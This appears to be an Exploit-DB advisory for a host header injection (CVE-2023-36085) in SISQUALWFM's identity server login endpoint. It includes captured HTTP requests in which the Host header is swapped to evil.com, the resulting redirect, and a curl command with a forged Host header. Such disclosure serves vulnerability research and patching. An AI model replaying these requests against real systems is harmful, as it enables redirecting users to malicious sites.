SISQUALWFM 7.1.319.103 Host Header Injection

vendor:

SISQUALWFM

by:

Omer Shaik

5.1

CVSS

MEDIUM

Host Header Injection

200

CWE

Product Name: SISQUALWFM

Affected Version From: 7.1.319.103

Affected Version To: 7.1.319.110

Patch Exists: YES

Related CWE: CVE-2023-36085

CPE: a:sisqual:sisqualwfm:7.1.319.103

Metasploit:

Other Scripts:

Platforms Tested: SISQUAL WFM

2023

SISQUALWFM 7.1.319.103 Host Header Injection

The vulnerability in SISQUALWFM version 7.1.319.103 allows attackers to manipulate webpage links or redirect users to malicious sites by tampering with the host header. This specifically targets the /sisqualIdentityServer/core endpoint.

Mitigation:

To mitigate this vulnerability, ensure that input validation is performed on the host header to prevent malicious manipulation. Regular security assessments and monitoring can also help in identifying and addressing such issues.

Source

Exploit-DB raw data:

# Exploit Title: SISQUALWFM 7.1.319.103 Host Header Injection
# Discovered Date: 17/03/2023
# Reported Date: 17/03/2023
# Resolved Date: 13/10/2023
# Exploit Author: Omer Shaik (unknown_exploit)
# Vendor Homepage: https://www.sisqualwfm.com
# Version: 7.1.319.103
# Tested on: SISQUAL WFM 7.1.319.103
# Affected Version: sisqualWFM - 7.1.319.103
# Fixed Version: sisqualWFM - 7.1.319.111
# CVE : CVE-2023-36085
# CVSS: 3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
# Category: Web Apps




A proof-of-concept(POC) scenario that demonstrates a potential host header injection vulnerability in sisqualWFM version 7.1.319.103, specifically targeting the /sisqualIdentityServer/core endpoint. This vulnerability could be exploited by an attacker to manipulate webpage links or redirect users to another site with ease, simply by tampering with the host header.

****************************************************************************************************
Orignal Request
****************************************************************************************************
GET /sisqualIdentityServer/core/login HTTP/2
Host: sisqualwfm.cloud
Cookie:<cookie>
Sec-Ch-Ua: "Not A(Brand";v="24", "Chromium";v="110"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

****************************************************************************************************
Orignal Response
****************************************************************************************************
HTTP/2 302 Found
Cache-Control: no-store, no-cache, must-revalidate
Location: https://sisqualwfm.cloud/sisqualIdentityServer/core/
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
Date: Wed, 22 Mar 2023 13:22:10 GMT
Content-Length: 0
****************************************************************************************************




██████╗  ██████╗  ██████╗
██╔══██╗██╔═══██╗██╔════╝
██████╔╝██║   ██║██║     
██╔═══╝ ██║   ██║██║     
██║     ╚██████╔╝╚██████╗
╚═╝      ╚═════╝  ╚═════╝
                



****************************************************************************************************
Request has been modified to redirect user to evil.com (Intercepted request using Burp proxy)
****************************************************************************************************
GET /sisqualIdentityServer/core/login HTTP/2
Host: evil.com
Cookie:<cookie>
Sec-Ch-Ua: "Not A(Brand";v="24", "Chromium";v="110"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

****************************************************************************************************
Response
****************************************************************************************************
HTTP/2 302 Found
Cache-Control: no-store, no-cache, must-revalidate
Location: https://evil.com/sisqualIdentityServer/core/
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
Content-Length: 0


****************************************************************************************************
Method of Attack
****************************************************************************************************

curl -k --header "Host: attack.host.com" "Domain Name + /sisqualIdentityServer/core" -vvv

****************************************************************************************************